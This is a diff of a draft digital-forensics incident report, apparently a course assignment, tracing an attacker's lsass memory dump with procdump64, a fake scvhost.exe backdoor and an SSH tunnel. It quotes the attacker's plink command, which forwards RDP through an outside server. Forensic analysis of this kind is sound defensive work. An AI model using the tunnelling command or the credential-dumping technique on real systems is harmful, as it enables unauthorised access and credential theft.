blackTieV2/ZEIT8028/Assignments/Assignment2/Reports/First Draft.md

      Script Path: C:\Users\Alan\AppData\Local\Temp\Service.ps1
      ```

+5. **Execution of `procdump64.exe` and Memory Dumping:**
+   - **Execution Context:** The `procdump64.exe` tool, a legitimate Sysinternals utility, was used by the attacker to create a memory dump of the `lsass.exe` process.
+This process is critical for managing user authentication and security policies, and its memory typically contains sensitive credentials.
+   - **Evidence:**
+     - **Prefetch Files:** The execution of `procdump64.exe` was confirmed through the presence of a Prefetch file `PROCDUMP64.EXE-7C654F89.pf`, which indicates that the tool was run on `17/08/2019` at `6:00:34 AM`.
+     - **USN Journal Entries:** The USN Journal confirms the creation of `procdump64.exe` and its use around `5:59:54 AM`, closely preceding the creation of the memory dump.
+     - **Jump Lists and LNK Files:** Evidence from Jump Lists and LNK files shows the creation and access of `lsass.zip`, likely indicating that the `lsass.dmp` file was compressed, potentially for exfiltration.
+     ```plaintext
+     Execution Time: 2019-08-17 06:00:34 AM (UTC)
+     File Path: C:\Users\Craig\Desktop\Procdump\procdump64.exe
+     ```

+   - **Impact:** The creation of the `lsass.dmp` file suggests that the attacker was able to extract plaintext credentials and other sensitive information from memory.
+This action, combined with the creation of `lsass.zip`, indicates a high likelihood of data exfiltration or preparation for such.

+---

 #### **Third Stage: Deployment of Backdoor and Establishment of Remote Access**

 1. **Download and Execution of `scvhost.exe`:**
    - **Execution Context:** The `scvhost.exe` file, maliciously named to mimic the legitimate Windows process `svchost.exe`, was downloaded and executed.
 This file served as a backdoor, providing the attacker with persistent remote access to the compromised system.
    - **Evidence:**
-     - **File Analysis:** The presence and execution of `scvhost.exe` were confirmed through memory and disk analysis.
-Unlike the legitimate `svchost.exe` located in `C:\Windows\System32\`, this version was found in `C:\Users\Alan\AppData\Local\Temp\` and was flagged as malicious by multiple antivirus engines.
+     - **Memory Artifacts and File Analysis:** The presence and execution of `scvhost.exe` were confirmed through both memory and disk analysis.
+Unlike the legitimate `svchost.exe` located in `C:\Windows\System32\`, this malicious version was found in `C:\Users\Alan\AppData\Local\Temp\` and was flagged as malicious by multiple antivirus engines.
+       - **Process Information:** The `scvhost.exe` process (PID 1840) was active between `5:49:18 AM` and `5:49:48 AM` on `17/08/2019`.
+The process was short-lived, running for only 30 seconds, indicating it was designed to execute a quick task—likely initializing or maintaining a backdoor connection.
+       - **Evasion Techniques:** Memory analysis revealed that `scvhost.exe` employed evasion techniques to remain partially hidden from certain process enumeration tools, being visible in the standard process list (`Pslist`) but not detected by others like `Psscan` or `Thrdproc`.
-     - **Impact:** The execution of `scvhost.exe` allowed the attacker to maintain a backdoor for remote control.
+     - **Impact:** The execution of `scvhost.exe` allowed the attacker to maintain a covert backdoor for remote control, leveraging its brief and hidden activity to avoid detection while sustaining access to the compromised system.
      ```plaintext
      File Name: scvhost.exe
      File Path: C:\Users\Alan\AppData\Local\Temp\scvhost.exe
+     Process ID (PID): 1840
+     Process Start Time: 17/08/2019 5:49:18 AM
+     Process End Time: 17/08/2019 5:49:48 AM
+     Evasion: Partially hidden (Not detected by Psscan and Thrdproc)
      ```

 2. **Establishment of SSH Tunnel Using `plink.exe`:**
    - **Execution Context:** The `plink.exe` executable was used to create an SSH tunnel that forwarded a local port (127.0.0.1:12345) to a remote IP (10.2.0.2:3389), effectively enabling remote desktop access over RDP.
 This port forwarding facilitated unauthorized remote access to the system.
    - **Evidence:**
-     - **Prefetch Files:** The execution of `plink.exe` was confirmed via prefetch files, which indicated it was run from `\Windows\Temp\`.
-     - **Command-Line Arguments:** The command-line arguments used with `plink.exe` specified the SSH connection to the remote server `69.50.64.20` on port `22` and the forwarding of traffic to port `3389`, the default port for RDP.
+     - **Execution Context:** The `plink.exe` tool was executed from `\Windows\Temp\`, with command-line arguments that set up an SSH tunnel, forwarding traffic from `127.0.0.1:12345` to `10.2.0.2:3389` via the remote server `69.50.64.20` on port `22`.
+       - **Memory Analysis:** Memory artifacts showed that `plink.exe` had loaded several critical DLLs, including `ntdll.dll`, `kernel32.dll`, and `crypt32.dll`, indicating that it was actively engaged in system-level operations and potentially managing encrypted communications.
+       - **Significance:** The memory artifacts also suggest that the `scvhost.exe` process may have played a role in initializing or maintaining the SSH tunnel created by `plink.exe`, further supporting the attacker's efforts to sustain remote access and exfiltrate data.
+     - **Impact:** The execution of `plink.exe` and its use for SSH tunneling and RDP forwarding were critical in ensuring the attacker could maintain control over the compromised system.
+This persistence mechanism allowed the attacker to bypass network defenses and potentially exfiltrate data or execute further commands remotely.
+The forwarding of traffic to port `3389`, the default port for RDP, suggests that the attacker established a Remote Desktop Protocol (RDP) connection, providing them with full remote control of the system.
      ```plaintext
      Execution Time: 2019-08-17 05:52:31 AM (UTC)
      File Path: \Windows\Temp\plink.exe
      Command: plink.exe -ssh 69.50.64.20 -P 22 -L 127.0.0.1:12345:10.2.0.2:3389
      ```

-   - **Significance:** The execution of `plink.exe` and its use for SSH tunneling and RDP forwarding were critical in ensuring the attacker could maintain control over the compromised system.
-This persistence mechanism allowed the attacker to bypass network defenses and potentially exfiltrate data or execute further commands remotely.
-The fact that the forwarded port was 3389, the default port for RDP, indicates the attacker was specifically aiming to enable remote desktop access, which is a strong indication of the sophistication and intent behind the compromise.
+   - **Significance:** The execution of `plink.exe` and its use for SSH tunneling and RDP forwarding were pivotal in ensuring the attacker could maintain and sustain remote control over the compromised system.
+This persistence mechanism, reinforced by the brief but critical execution of `scvhost.exe`, allowed the attacker to bypass network defenses and securely exfiltrate data or execute further commands remotely.
+The fact that the forwarded port was 3389, the default port for RDP, strongly indicates that the attacker intended to establish Remote Desktop access.
+This highlights the sophistication and deliberate intent behind the compromise, underscoring the attacker's focus on maintaining long-term access and control.

 ---